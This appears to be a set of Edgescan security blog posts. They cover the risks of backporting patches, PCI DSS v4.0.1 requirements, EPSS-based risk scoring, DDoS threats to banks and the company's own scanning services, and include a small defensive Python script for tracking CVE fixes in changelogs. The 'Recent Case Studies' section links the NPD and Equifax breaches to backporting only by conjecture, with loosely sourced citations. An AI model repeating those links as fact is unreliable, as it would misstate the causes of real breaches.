Example: A company running PHP 7.4 with backported security fixes fails a PCI-DSS scan because the scanner flags PHP 7.4 as vulnerable. The company must manually justify that fixes were applied, delaying compliance approval. Simply stating that a service has been patched will generally not be enough of a justification for PCI-DSS and other compliance frameworks (GDPR, ISO, NIS2) without a reference to the specific security patch. Many different patches are released for outdated versions of software, each one fixing a specific vulnerability or group of vulnerabilities.

Again, it is recommended that organizations develop a patching policy that prioritizes official updates over backporting whenever possible. They should also maintain detailed patching documentation and work with compliance auditors to validate backported fixes.

#### 4. Increased Attack Surface Due to Dependency Issues

Security patches are designed for modern system architectures, dependencies, and libraries. Backporting may create compatibility issues that introduce new security risks. A patched application may still be vulnerable due to outdated dependencies that lack the latest security protections.

Example: A Node.js application runs on an outdated Express.js framework with backported security fixes. However, the backport does not address critical dependency vulnerabilities in other libraries, leaving the system exposed.

Security teams should work closely with application and system owners to understand what is covered by a specific backport solution and what residual risk remains, and then consider additional controls to mitigate that residual risk.
Senior security staff would then need to adjust their Business Impact Analysis (BIA) and Risk Assessment (RA) accordingly to account for the residual risk to the organization.

#### 5. Backported Patches Are Not Officially Supported

Vendors do not officially support backported patches, meaning organizations must rely on in-house security teams or third parties to maintain them. If a backported patch introduces bugs or breaks functionality, there is no official vendor support to resolve the issues. Even with a long-term support (LTS) contract, backporting is not covered and often requires additional internal resources, or third-party contracts, to support end-of-life (EOL) systems and components.

Example: A company backports a security patch to an end-of-life Linux distribution (e.g., Ubuntu 16.04). A critical bug emerges after patching, but the vendor no longer provides updates, forcing the company to manage fixes themselves. This introduces delays in patching security-critical business systems, creates additional residual risk and audit and compliance complications, and adds operational overhead for cyber-security teams.

#### 6. Increased Complexity & Maintenance Overhead

Backporting creates technical debt, making long-term security management more complex and expensive. Security teams must manually track which patches have been applied and ensure they remain effective over time. Future updates also become harder, increasing the risk of misconfigurations and security gaps.

Example: An organization running an ERP system on Java 8 continuously backports security fixes instead of upgrading. Over time, maintaining the patches becomes costly, and the system remains vulnerable to modern attack techniques.

Establish a clear policy for when to backport and when to upgrade, ensuring long-term security. Backporting should only be considered a short-term mitigation and never a long-term fix.
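Sections 3 and 6 above both come down to the same record-keeping problem: an auditor or ASV dispute needs the specific patch reference per CVE, and the team needs to track which fixes a given package build actually carries. The script below is an added example (not Edgescan's code) of extracting that evidence from a package changelog; the RPM-style changelog, the package versions and the CVE-2099-* identifiers are constructed placeholders.

```python
"""Backport evidence tracker (added example, not Edgescan's code).

Parse a package changelog, record which CVE each build claims to fix,
and answer "is CVE-X fixed in the installed build, and where is the
evidence?" for each CVE a scanner flagged. The changelog below is a
constructed sample in RPM changelog style; CVE-2099-* are placeholder
identifiers, not real vulnerabilities.
"""
import re
from dataclasses import dataclass, field

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
# RPM-style changelog header: "* Wed Mar 13 2024 Name <mail> - 2.4.29-6"
HEADER_RE = re.compile(
    r"^\*\s+(?P<date>\w{3} \w{3} \d{1,2} \d{4}).*\s-\s(?P<version>\S+)\s*$"
)

# Constructed sample: newest entry first, as distributions write them.
SAMPLE_CHANGELOG = """\
* Wed Mar 13 2024 Maintainer <maint@example.invalid> - 2.4.29-6
- Backport fix for CVE-2099-0003 (request handling, from 2.4.58)
* Mon Nov 20 2023 Maintainer <maint@example.invalid> - 2.4.29-5
- Backport fixes for CVE-2099-0001 and CVE-2099-0002
* Fri Jun 02 2023 Maintainer <maint@example.invalid> - 2.4.29-4
- Rebuild, no security content
"""


@dataclass
class ChangelogEntry:
    version: str
    date: str
    cves: set = field(default_factory=set)


def parse_changelog(text):
    """Return entries newest-first, each with the CVE IDs its lines mention."""
    entries = []
    current = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            current = ChangelogEntry(m.group("version"), m.group("date"))
            entries.append(current)
        elif current is not None:
            current.cves.update(CVE_RE.findall(line))
    return entries


def fixes_included(installed_version, entries):
    """Map CVE -> 'version (date)' for every fix at or below the installed
    build. Changelog order is used instead of parsing version strings, so
    an installed build that is absent from the changelog yields {} (no
    evidence) rather than a guess."""
    versions = [e.version for e in entries]
    if installed_version not in versions:
        return {}
    included = {}
    for entry in reversed(entries[versions.index(installed_version):]):
        for cve in entry.cves:
            # Oldest build that fixed it is the evidence an auditor wants.
            included.setdefault(cve, f"{entry.version} ({entry.date})")
    return included


def evidence_report(installed_version, entries, required_cves):
    """For each CVE a scanner flagged, the evidence string or None (a gap
    that is residual risk until an official upgrade)."""
    included = fixes_included(installed_version, entries)
    return {cve: included.get(cve) for cve in required_cves}


if __name__ == "__main__":
    entries = parse_changelog(SAMPLE_CHANGELOG)
    report = evidence_report("2.4.29-5", entries, ["CVE-2099-0001", "CVE-2099-0003"])
    for cve, evidence in report.items():
        print(f"{cve}: {evidence or 'NO EVIDENCE - residual risk, plan upgrade'}")
```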
Application teams, system owners, system administrators, and leadership should understand the goals of the cyber security program and whether additional resources are needed; routine BIAs and RAs help to establish strategies for moving away from long-term backporting.

#### 7. Exposure to Supply Chain Attacks

With the complexity of business technologies and engagements today, organizations may rely on third-party or unofficial sources for backported patches, increasing the risk of supply chain attacks.

Example: A backported patch for an outdated WordPress plugin is downloaded from an untrusted third-party repository. The patch contains malicious code, allowing attackers to inject malware or ransomware into the system.

Though many organizations have talented development and admin teams, it is hard for those teams to keep up with the speed at which business moves and expands today. Reliance on third-party resources for backporting security fixes in systems, applications, and components is increasingly common. Therefore, only use trusted sources for security patches and verify patch integrity before deployment. However, even trusted sources can be compromised, so it is best to remain at N-1 or fully up to date wherever possible.

#### Final Thoughts

Backporting is a temporary risk management strategy but should not replace full software upgrades. Organizations must minimize reliance on backporting and prioritize officially supported versions to maintain a strong cybersecurity posture and reduce risk.

Many developers and system administrators have varying levels of risk awareness, often prioritizing deadlines, functionality, and performance over security. As a result, security is frequently treated as a secondary concern.
To mitigate this, security must be integrated into the Software Development Lifecycle (SDLC) from the outset, following a DevSecOps approach that ensures security is considered alongside functionality and performance.

Developing and maintaining secure, updated solutions for complex systems is challenging. However, security is not just an IT issue; it must be a companywide priority. A shared understanding of risk across all teams is essential for leadership to accurately assess the organization’s security posture, staff limitations, and available resources (FTEs). Aligning security priorities with policy, compliance, and business objectives enables organizations to effectively manage risk, meet regulatory requirements, and achieve long-term security goals.

#### Recent Case Studies and Research

Identifying specific cybersecurity incidents directly attributed to backporting vulnerabilities is challenging, as organizations often do not disclose detailed internal patch management practices. However, several studies and reports highlight the potential risks associated with backporting:

Increased Attack Surface Due to Dependency Issues

Case Study: National Public Data Breach (April 2024)

In April 2024, National Public Data (NPD), a company providing background checks, was breached through a third-party contractor who failed to update their security patches.
This oversight allowed attackers to steal sensitive personal data, including Social Security numbers and addresses, affecting approximately 2.9 billion individuals.

National Public Data Breach (April 2024) - Possibly Related to Backporting

- Cause: Third-party contractor failed to apply security patches.
- Connection to Backporting: The breach was due to outdated security patches on a third-party system. If the contractor had been using an older system with backported patches, this could have contributed to vulnerabilities.
- Source: https://fortifydata.com/blog/third-party-data-breaches-of-2024/?utm_source=chatgpt.com

Delayed Response to Emerging Threats

Case Study: Equifax Data Breach (2017)

In 2017, Equifax suffered a significant data breach when attackers exploited an unpatched vulnerability in the Apache Struts framework. Despite the availability of a patch, delays in its application allowed attackers to access sensitive information of approximately 150 million customers.

Equifax Data Breach (2017) - Possibly Related to Backporting

- Cause: Unpatched Apache Struts vulnerability (CVE-2017-5638).
- Connection to Backporting: Equifax failed to apply an official patch in time, but there is no direct mention of backporting. If Equifax had been running an older version of Apache Struts with backported patches instead of upgrading, this could have contributed to the problem.
- Source: https://tuxcare.com/blog/the-risks-of-delayed-patching-lessons-learned-from-high-profile-cyber-attacks/

1. Backporting Vulnerabilities in Web Applications: Research presented at the USENIX Security Symposium examined the challenges of backporting security patches in web applications, particularly focusing on injection vulnerabilities. The study highlighted that improper backporting could introduce new vulnerabilities or fail to fully address existing ones, emphasizing the need for careful analysis and testing during the backporting process.

2. Backporting Practices in Package Dependency Networks: An analysis of backporting practices in package dependency networks, published in IEEE Transactions on Software Engineering, explored how backporting aims to bring bug or vulnerability fixes from newer to older software releases. The study found that while backporting is beneficial for maintaining legacy systems, it requires extensive technical expertise and can introduce new risks if not properly managed.

3. Challenges in Backporting Security Fixes: A report by SentinelOne discussed the complexities of backporting, noting that adapting security patches designed for modern systems to older versions can result in unanticipated side effects. The report emphasized that backporting requires extensive technical expertise and may introduce new risks if not properly tested.

#### References

1. Shi, Z., Luo, L., & Zhang, D. (2022). Challenges in backporting security patches for web applications. Presented at the USENIX Security Symposium. Retrieved from https://www.usenix.org/conference/usenixsecurity22/presentation/shi
2. Decan, A., Mens, T., & Gonzalez-Barahona, J. M. (2021). Backporting practices in package dependency networks. IEEE Transactions on Software Engineering. Retrieved from https://decan.lexpage.net/files/TSE-2021.pdf
3. SentinelOne. (n.d.). Challenges in backporting security fixes. SentinelOne Cybersecurity Reports. Retrieved from https://www.sentinelone.com/cybersecurity-101/cybersecurity/backporting/

### Navigating PCI DSS v4.0.1 with Edgescan

The transition from PCI DSS v3.2.1 to PCI DSS v4.0 marked a significant shift towards a more proactive approach to payment security. PCI DSS v4.0.1 was then released on June 11, 2024 to update some requirements and add a glossary of terms. PCI DSS v3.2.1 was retired on March 31st, 2024, but certain requirements of PCI DSS v4.0.1 go into full effect on March 31st, 2025.
Today, we will focus on Requirements 6 and 11 of PCI DSS v4.0.1, concerning vulnerability scanning, remediation and penetration testing. First, we will explore the difference between Vulnerability Scanning and Penetration Testing according to PCI DSS v4.0.1, since this can be a point of confusion (no doubt exacerbated by certain vendors marketing “automated penetration testing” services).

#### Vulnerability Scanning vs. Penetration Testing

Vulnerability scanning is an automated process to identify potential vulnerabilities in a network or web application. These scans serve as a preliminary step, providing a snapshot of potential security weaknesses that exist within an environment. Vulnerability scanners are tools, and their results need to be validated by humans afterward.

Penetration testing, on the other hand, is not a tool. Rather, it’s a service performed by experienced professionals. Penetration tests go much deeper than vulnerability scans that rely purely on automation. As defined by the PCI SSC, penetration testing involves a credentialed expert actively attempting to exploit vulnerabilities to determine how an attacker could potentially enter an environment. Penetration testing simulates real-world attack scenarios to help define an organization’s potential exposure and devise a strategy to remediate these vulnerabilities.

Vulnerability scanning is usually the first step when performing a penetration test, but a human is always required to interpret those results. A penetration test is not deemed adequate if it solely focuses on exploiting vulnerabilities identified in a scan. Penetration testers, with their deep knowledge of systems and potential attack strategies, manually probe for weaknesses. Some techniques employed by penetration testers to obtain this extra layer of depth include fuzzing, injection, forgery tests, and business logic testing (scanners lack the real-world risk context that humans possess).
They may use automated tools as part of their toolkit, but the expertise and creative problem-solving of the tester are indispensable since those qualities cannot be automated. For example, if a vulnerability scan identifies a potential weakness in an application server, a penetration tester may use this foothold to launch subsequent attacks that an automated tool would not attempt. By chaining exploits and using the compromised server as a staging point, testers can simulate complex attack paths that an attacker might use, uncovering layers of potential weaknesses that a scan alone would not be able to reveal.

Penetration testing also includes the assessment of security monitoring and detection methods. Testers confirm the effectiveness of logging and file integrity monitoring mechanisms, aspects critical to an organization’s ability to detect and respond to an attack.

#### Requirement 6

- Security Vulnerability Identification & Risk Ranking: Requirement 6.3.1 mandates that organizations identify new security vulnerabilities using industry-recognized sources and assign risk rankings based on industry best practices. The risk ranking must identify all high-risk and critical vulnerabilities. Regular vulnerability scanning ensures that vulnerabilities are systematically discovered and prioritized for remediation.
- Protection from Known Vulnerabilities through Patching: Requirement 6.3.3 instructs organizations to install security patches for critical vulnerabilities within one month of release; other patches must be applied based on a risk assessment following the ranking process defined in 6.3.1. Vulnerability scanning plays a critical role in detecting outdated or unpatched systems, ensuring compliance with this requirement.
- Protection of Public-Facing Web Applications: Requirement 6.4.1 states that public-facing web applications must undergo manual or automated vulnerability assessments at least once every 12 months and after significant changes.
  Alternatively, organizations can deploy automated solutions such as Web Application Firewalls (WAFs) to detect and prevent web-based attacks. Vulnerability scanning is crucial for meeting this requirement by identifying exploitable weaknesses in web applications.
- Verification of PCI DSS Controls After Significant Changes: Following significant changes to system components, requirement 6.5.2 requires organizations to verify that all applicable PCI DSS requirements remain in place and to update documentation accordingly. Vulnerability scanning ensures that newly introduced or modified systems are not left exposed to security threats after major updates or infrastructure changes.

#### Requirement 11

- Quarterly Vulnerability Scanning: Under requirement 11.3.2, organizations are required to conduct quarterly vulnerability scans by a PCI SSC Approved Scanning Vendor (ASV). This adjustment emphasizes not only identifying vulnerabilities but also resolving them in line with the ASV Program Guide’s standards. While only quarterly scans are required, scanning after significant changes to infrastructure or applications, such as adding new network devices or pushing deployments to production, is encouraged.
- Annual Penetration Testing on Cardholder Data Environments (CDEs): The updated requirements, 11.4.2 and 11.4.3, mandate an annual penetration test on both internal and external CDEs. This requirement also mandates penetration tests following significant changes to infrastructure or applications.
- Verification of Remediation and Risk-Based Approach: The new standard requires retesting to verify the effectiveness of corrective actions (11.4.4). In doing so, PCI DSS v4.0.1 also advocates a risk-based approach to prioritizing remediation efforts.
- Segmentation Controls and Multi-Tenant Service Providers: Requirement 11.4.5 necessitates testing segmentation controls annually or after any changes, which is critical for isolating the cardholder data environment (CDE).
  For multi-tenant service providers, the new standards (11.4.6) call for validating logical separation controls biannually with a penetration test. Another set of biannual penetration tests is required (A.1.1.4) for multi-tenant service providers to determine adequate separation between customers in their environment. Requirement 11.4.7 increases the emphasis on multi-tenant service providers assisting customers with their external penetration tests.

#### Edgescan Can Fulfill PCI DSS v4.0.1 Requirements

Risk rating is a key part of requirement 6. The Edgescan platform displays risk ratings for every vulnerability according to EPSS (Exploit Prediction Scoring System), CISA (Cybersecurity and Infrastructure Security Agency) KEV (Known Exploited Vulnerability), CVSS (Common Vulnerability Scoring System) and asset criticality, to ensure that you are properly triaging PCI failing vulnerabilities in the context of your organization.

Edgescan is recognized as a PCI Approved Scanning Vendor (ASV) and offers an integrated platform where organizations can manage both their penetration testing findings and vulnerability scanning results. Consolidating these functions allows for a more efficient and holistic approach to maintaining PCI DSS v4.0.1 compliance.

The Edgescan platform only shows validated vulnerabilities, which means no false positives in Edgescan’s scanning results. On average, not having to validate false positives saves organizations’ security teams a few hours every week. In the context of quarterly vulnerability scans for PCI compliance, this is valuable. Organizations can be sure that all PCI failing vulnerabilities have been validated as true positives.

Edgescan offers unlimited, no-charge retesting on any penetration testing finding. This ensures that any remediation efforts are verified effectively and requirement 11.4.4 is satisfied without the financial strain associated with paying traditional penetration testing vendors for retesting.
The transition to PCI DSS v4.0.1 will significantly impact how organizations approach vulnerability scanning and penetration testing. Edgescan’s PCI compliance program utilizes a risk-based approach and unlimited, no-charge retesting on penetration testing findings to deliver simple but affordable PCI DSS v4.0.1 compliance.

#### References

- Requirements and Testing Procedures Version 4.0.1
- Summary of Changes from PCI DSS Version 3.2.1 to 4.0
- Summary of Changes from PCI DSS Version 4.0 to 4.0.1
- Information Supplement: Penetration Testing Guidance

### EPSS and EXF: Advancing Risk-Based Vulnerability Management

How Edgescan's integrated scoring systems deliver actionable intelligence for ransomware defense and strategic remediation

Edgescan leverages the Exploit Prediction Scoring System (EPSS) and its proprietary Edgescan eXposure Factor (EXF) to deliver significant value to its clients by prioritizing vulnerability remediation and enhancing overall security posture. This approach is particularly effective in addressing ransomware-related vulnerabilities.

#### EPSS and EXF Integration

The EPSS is a data-driven model that estimates the likelihood of a software vulnerability being exploited in the wild. It generates a probability score ranging from 0 to 1, with higher scores indicating a greater likelihood of exploitation. By incorporating EPSS, Edgescan can prioritize vulnerabilities based on their potential for exploitation rather than solely on their severity.

The EXF, on the other hand, is a comprehensive scoring system developed by Edgescan. It combines data from EPSS, the Common Vulnerability Scoring System (CVSS), and the Cybersecurity and Infrastructure Security Agency's Known Exploited Vulnerabilities (CISA KEV) catalog. This integration allows EXF to provide a unified score ranging from 0 to 100, indicating the risk level of each vulnerability.
A higher EXF score signifies a greater risk, helping organizations focus on the most critical threats.

#### Validation Process

At Edgescan, our validation methodology sets the industry standard for vulnerability accuracy. Our advanced continuous testing platform combines enterprise-grade scanning technology with expert manual penetration testing and validation. This full-stack approach eliminates false positives and provides customers with an exact, real-time view of their security posture. The validated findings directly inform our EXF scoring, ensuring precise risk quantification and actionable intelligence.

#### Delivering Strategic Value

The integration of EPSS predictive modeling and our proprietary EXF scoring empowers organizations to implement data-driven remediation strategies. This is particularly crucial for security teams managing extensive vulnerability backlogs with finite resources. By focusing remediation efforts on vulnerabilities that present the highest likelihood of exploitation and business impact, organizations can significantly reduce their mean time to remediation (MTTR) and strengthen their security foundation.

#### Ransomware Vulnerability Intelligence

Modern ransomware campaigns actively target known vulnerabilities across the attack surface. Edgescan's platform provides deep visibility into ransomware-exploitable vulnerabilities through advanced threat correlation. By combining EPSS exploitation probability data with EXF risk scoring, organizations can identify and prioritize vulnerabilities that align with current ransomware TTPs (Tactics, Techniques, and Procedures).

Our correlation engine maps vulnerabilities against multiple threat intelligence sources, including the CISA KEV catalog, to provide context-aware risk scoring. When a vulnerability demonstrates high EPSS metrics and appears in authoritative threat feeds, the EXF score reflects this elevated risk profile, enabling rapid response prioritization.
This intelligence-driven approach optimizes security resources while providing focused protection against ransomware threats.

The recent expansion of the CISA KEV catalog, including critical vulnerabilities CVE-2024-9463 and CVE-2024-9465, underscores the evolving threat landscape. Edgescan's integrated EPSS and EXF scoring ensures organizations maintain resilient security postures through precise vulnerability intelligence and risk-based remediation.

Edgescan's integration of the Exploit Prediction Scoring System (EPSS) and the Edgescan eXposure Factor (EXF), along with thorough validation, equips clients with an effective tool for prioritizing and addressing vulnerabilities. This approach is especially efficient in mitigating threats related to ransomware, providing significant value by strengthening security and lowering the risk of exploitation.

### Dutch Central Bank Issues Warning: The Rising Threat of DDoS Attacks on Financial Infrastructure

In a significant development highlighting the growing cybersecurity concerns in the financial sector, the Dutch Central Bank has issued an unprecedented warning to citizens, advising them to consider keeping cash reserves at home. This warning comes amid escalating geopolitical tensions between East and West, substantially increasing the risk of cyber attacks against digital services.

#### The Rising Threat Landscape

The frequency and sophistication of cyber attacks targeting financial institutions have seen a dramatic 50% increase since 2023. Of particular concern are hyper-volumetric Distributed Denial of Service (DDoS) attacks, which can overwhelm banking systems and disrupt essential financial services including:

- Payment processing systems
- Card payment networks
- Banking transaction systems
- ATM networks

#### Understanding Modern DDoS Attacks

Today's DDoS attacks have evolved significantly in both scale and complexity. These attacks can generate traffic volumes of up to 1 billion packets per second.
This massive traffic volume can overwhelm even sophisticated defense systems, potentially disrupting services for hours or days.

#### The IoT Connection

A particularly concerning aspect of modern DDoS attacks is the exploitation of Internet of Things (IoT) devices. Common household smart devices, from refrigerators to washing machines, can be hijacked without their owners' knowledge and incorporated into botnets for these attacks. This vast network of compromised devices gives attackers substantial computing power to launch devastating attacks.

#### Accessibility of Attack Tools

The barrier to entry for launching these attacks has decreased significantly. DDoS-for-hire services are available on the dark web for as little as $10 per hour, putting these attacks within reach of a range of threat actors, from cybercriminals to nation-state operators and hacktivists.

#### Regulatory Response

The European Union has responded to these threats with the Digital Operational Resilience Act (DORA), which mandates stronger cybersecurity measures for financial institutions. The legislation aims to ensure that organizations are better prepared to detect, prevent, and recover from such attacks.

#### Practical Recommendations

While the Dutch Central Bank's warning is significant, it is important to keep it in perspective. The recommendation is not to withdraw large sums but to keep a modest amount of cash (approximately a few hundred euros) available for essential purchases in case of a temporary service disruption.

#### Looking Ahead

While financial institutions continue to strengthen their cybersecurity defenses, the probability of successful attacks disrupting banking infrastructure is higher than ever before. Organizations must remain vigilant and invest in robust security measures to protect against these evolving threats.

What now? Don't panic, but be prepared.
Maintaining basic contingency plans, including modest cash reserves, is a prudent way to manage potential risks in our increasingly connected world, as we continue to rely ever more heavily on digital financial services.

### What Makes Edgescan Stand Out? Key Insights from Gartner Peer Reviews

Edgescan, a prominent player in the cybersecurity landscape, has garnered significant attention and praise on Gartner Peer Insights. This platform, which aggregates reviews and ratings from verified users, provides a comprehensive view of how Edgescan performs in real-world use. Here's an in-depth look at how Edgescan scores and what makes it stand out in the cybersecurity domain.

#### Overview of Edgescan

Edgescan is a comprehensive Continuous Threat Exposure Management (CTEM) solution that integrates several critical cybersecurity functions, including External Attack Surface Management (EASM), Vulnerability Management (VM), Application Security Testing (AST), API Security Testing, and Penetration Testing as a Service (PTaaS). This integration allows organizations to manage and mitigate security risks effectively, combining automated cyber analytics with human validation to minimize false positives and prioritize critical vulnerabilities [1].

#### Ratings and Reviews

On Gartner Peer Insights, Edgescan has received an impressive overall rating of 4.7 out of 5 stars, based on 54 reviews [1]. This high rating reflects the platform's robust capabilities and the satisfaction of its users. The reviews highlight several key aspects of Edgescan's performance:

- Customer Experience: Edgescan scores highly in customer experience, with users praising its outstanding customer service and dedicated account management. Tailored security reporting and manual review of results ensure that users receive meaningful, actionable insights [1].
- Integration and Deployment: Users have rated Edgescan's integration and deployment capabilities at 4.8 out of 5.
  This high score indicates that the platform is easy to implement and integrates seamlessly with existing systems. The ease of deployment and administration is a significant advantage for organizations looking to enhance their security posture without extensive overhead [1].
- Service and Support: Edgescan's service and support are also highly rated, with a score of 4.8. Users appreciate the platform's responsive support team and the comprehensive assistance provided during and after onboarding [1].
- Product Capabilities: The platform's product capabilities receive a rating of 4.7, reflecting its effectiveness in identifying and mitigating security vulnerabilities. The combination of automated scanning and manual validation ensures high accuracy and minimal false positives [1].

#### Key Strengths

Several strengths make Edgescan a preferred choice among cybersecurity professionals:

- Manual Review and Custom Reporting: One of Edgescan's standout features is its manual review process, which significantly reduces false positives. Combined with customizable reporting, it allows organizations to focus on the most critical vulnerabilities and streamline their remediation efforts [1].
- Scalability and Flexibility: Edgescan is praised for its scalability and flexibility, making it suitable for organizations of various sizes and industries. Whether a small business or a large enterprise, Edgescan can adapt to meet specific security needs [1].
- Comprehensive Security Coverage: By integrating multiple security functions into a single platform, Edgescan provides comprehensive coverage that addresses a wide range of security threats. This holistic approach simplifies vulnerability management and enhances overall security posture [1].

#### Conclusion

Edgescan's high scores on Gartner Peer Insights reflect its effectiveness and reliability as a cybersecurity solution.
The platform's strong customer service, ease of integration, and robust product capabilities make it a valuable asset for organizations seeking to enhance their security measures. With its focus on reducing false positives and providing actionable insights, Edgescan stands out as a leader in the cybersecurity field, helping organizations protect their digital assets in an increasingly complex threat landscape.

#### References

[1]: Edgescan Reviews, Ratings & Features 2024 | Gartner Peer Insights

### The Legacy Challenge of False Positives in Vulnerability and Exposure Detection

After discussing CTEM (Continuous Threat and Exposure Management) and ASPM (Application Security Posture Management) recently with some noted industry analysts, the majority stated that their clients face the same challenges year on year, and that these still have not been solved.

As the cyber industry pushes ahead, issues like accuracy appear to be ignored by the market because they seem too complex to solve. Edgescan has attempted to solve this issue over the past 5 years by building a data lake of triaged vulnerabilities and using a combination of clever technology and data science to automate the validation of vulnerabilities. Our approach has resulted in near false-positive-free vulnerability intelligence, with only approximately 8% of discovered vulnerabilities requiring manual inspection by our team.

#### Reasons for false positives

Despite advancements, vulnerability scanners can still produce false positives (flagging non-issues as threats). Automated scanning accuracy remains a significant challenge in cybersecurity. Here are a few reasons why:

- Complex Environments: Modern IT environments are highly complex, with a mix of on-premises, cloud, and hybrid systems.
  Ensuring accurate scans across these diverse environments is challenging, and most point-and-click solutions do not provide the coverage required.
- Configuration Issues: Incorrectly configured scanners can miss vulnerabilities (false negatives) or generate inaccurate results (false positives). Regularly fine-tuning and updating scanning configurations is a key component that is commonly overlooked and takes effort.
- Ecosystem Integration: How well vulnerability scanners integrate with other security tools and processes also affects accuracy. Poor integration can lead to gaps in coverage and missed vulnerabilities. "Wiring" separate tools together is never as simple as it may appear.

The impact of inaccuracy should not be underestimated; addressing it significantly improves efficiency and reduces friction in any vulnerability management or CTEM process.

False positives impact organisations in a number of ways, detailed below. It's worth considering how you are addressing this elephant in the room.

- Resource Drain: Security teams spend valuable time and effort investigating and remediating non-existent vulnerabilities. This not only wastes resources but also diverts attention from improving security posture. The drain also leaks into development teams' capacity, undermining trust and the value cyber security teams deliver to development.
- Alert Fatigue: Constantly dealing with false positives can lead to "alert fatigue", where security professionals (and possibly developers) become desensitized to alerts. Think "the boy who cried wolf." This increases the risk of genuine threats being overlooked in a continuous deluge of noise. Vulnerability validation suppresses that noise.
- Operational Disruption: False positives can disrupt daily operations, forcing developers and security teams to halt their regular tasks to address misleading alerts. Development is all about developing new products.
  Being faced with false positives wastes time, distracts from real issues, undermines trust, generates unneeded noise, and is generally a negative disruptor.
- Reduced Efficiency: The need to manually review each false positive slows down automated processes and reduces overall efficiency. Having to review every output from a continuous exposure/posture management pipeline goes against the flow of such a system and introduces friction.
- Impact on Morale: Continuous and persistent false positives lead to frustration and decreased motivation among security team and product development members, affecting team advancement and overall productivity.
- Prioritization: It is pointless to apply priority metadata to vulnerability intelligence if it contains errors and false positives. It simply amplifies the problem, raising the alarm needlessly for non-issues.

### Why CTEM is Better Than Traditional Penetration Testing: A Humorous Take

In the world of cybersecurity, the debate between Continuous Threat Exposure Management (CTEM) and traditional penetration testing is like comparing a high-tech drone to a trusty old bicycle. Sure, the bicycle has its charm, but the drone is just so much cooler and more efficient!

First off, let's talk about frequency. Traditional penetration testing is like that annual dentist visit: you know you need it, but you dread it, and it only happens once in a blue moon. CTEM, on the other hand, is like having a personal trainer who's with you every step of the way, making sure you're always in tip-top shape. With CTEM, you get continuous monitoring and real-time intelligence, so you're never caught off guard by a cyber threat or exposure. Organisations that use CTEM report a 30% drop in cyber incidents thanks to its continuous assessment and visibility.

Now, imagine traditional penetration testing as a surprise pub quiz.
It's stressful and demanding, and you only find out what you didn't know after the fact, once the quiz is over. CTEM, however, is like having the answers to the test beforehand. It provides ongoing assessments and helps you address, validate and prioritise vulnerabilities before they become a problem. We see a reduction in remediation time of up to 55% when a CTEM approach is applied.

Then there's the dynamism and adaptability factor. Traditional penetration testing is a bit like using a map from the 1800s to navigate modern-day Dublin: it's outdated and static. It was correct once, but it is a point-in-time view and doesn't account for the ever-changing landscape. CTEM, in contrast, is like having a GPS that updates in real time, guiding you through the twists and turns of the cybersecurity world with ease.

And let's not forget the cost. Traditional penetration testing can be a bit like buying a fancy suit you'll only wear once or twice a year. CTEM, however, is more like investing in a wardrobe that keeps you looking sharp all year round. It's cost-effective, reduces the resources required to maintain a robust posture and provides ongoing value. I've seen companies reduce overall security costs by up to 50% by implementing CTEM.

In conclusion, while traditional penetration testing has its place, CTEM is the way forward. It's continuous, adaptable, and cost-effective, and let's face it, who wouldn't want a personal trainer for their cybersecurity? So, hop on the CTEM bandwagon and leave those outdated methods in the dust: reduce cost and improve security posture. What's not to like?

Finally... what's the difference between CTEM and ASPM (Application Security Posture Management)?

#### Key Differences

- Scope: CTEM covers a broader range of security postures, including networks, endpoints, and cloud environments, while ASPM is specifically focused on application security.
- Lifecycle: CTEM is a continuous process that spans the entire organisation's security landscape, whereas ASPM is centred around the application lifecycle.
- Integration: ASPM integrates security into the SDLC, ensuring that applications are secure from the ground up. CTEM differs in that it continuously monitors and manages threats across all aspects of the organisation's infrastructure.

In summary, while both CTEM and ASPM are essential for a robust cybersecurity strategy, they serve different purposes. CTEM provides a holistic approach to managing threats across the entire organisation, whereas ASPM ensures that applications are secure throughout their lifecycle. Together, they form a comprehensive defence against the ever-evolving landscape of cyber threats. Edgescan provides both thanks to its full-stack approach: deep web application and API assessments coupled with continuous endpoint, cloud and network exposure management.

### Special Agent Agentless CIA – Can I really trust Agents?

I received interesting feedback on some prospect calls over the last few weeks when discussing internal vulnerability scanning.

Customer: "How do Edgescan do internal scanning?"

Edgescan: "We use an agentless approach using a lightweight virtual appliance."

Customer: "Great, I don't want to end up like a CrowdStrike customer."

The fallout from the recent CrowdStrike issue has IT sysadmins reviewing not only disaster recovery plans but also every piece of vendor-installed technology across their organization. When selecting a tool or service to conduct internal scanning and testing, it is important to understand resource constraints, what tools you already have pre-installed or available, and what you expect the vulnerability testing to achieve.
At Edgescan we have always believed that an agentless approach is superior, and most of our clients agree, but let's take a quick look at why we believe agentless is best.

#### First, what's the difference?

Agentless scanning provides visibility into the threats in your environments without the need to install software agents. In our approach the appliance acts as a secure landing point for our cloud-based SaaS, facilitating VPN tunnelling of scan traffic.

Agent-based scanning is more traditional and involves deploying components on each of the hosts or targets to be tested. It is a common approach for air-gapped networks or organizations not open to SaaS technologies, as it keeps all data in house. (Cough, cough.)

What are the advantages of each with regard to continuous vulnerability scanning and penetration testing?

#### Agent advantages

- Vulnerability data is kept in house (local storage), for sensitive air-gapped clients that don't wish to send data to the cloud. (Just remember, your installed software still needs to call home somehow to get updates, unless you're still doing updates with a floppy disk or CD, in which case you should look to upgrade from the 1990s.)
- Because agents are more traditional, they are sometimes better understood and align with more traditional expectations; they can feel familiar. (I'm not sure CrowdStrike customers share this sentiment.)
- Agents can be an active logger and, with the right permissions, can change policies and make config changes. (This can however be seen as out of scope for a VM tool; most clients in my experience don't like to have attack and defence in one solution.)
- Agents can operate independently and usually don't require a central control point. This means they can be deployed onto devices without consistent connectivity, such as WFH laptops. (How many WFH laptops in a modern organization are not built to a specific standard with permissions correctly enforced?)
  In reality, the practical utility here is minimal.
- Agents can run in real time and stop threats as they happen. (This is a bit of a sales pitch; good security is proactive, not reactive. Find the issue and address it well before it ever becomes an issue.)

#### Agentless advantages

- An established egress VPN connection. This allows our penetration testing team to connect to internal resources and validate vulnerabilities, which maintains Edgescan's unique offering: near false-positive-free vulnerability intelligence. It also allows our testing team to conduct penetration testing against any type of asset remotely.
- No resource requirements, both machine and human. Our appliance runs on a machine with 1 GB of RAM and has a minimal attack surface. In contrast, a compromised agent could have unfettered access to a machine and be devastating.
- Zero maintenance. No updates or configuration are required, as Edgescan uses the same technology stack for all assets, both internal and external. Over the established connection, Edgescan handles any required updates.
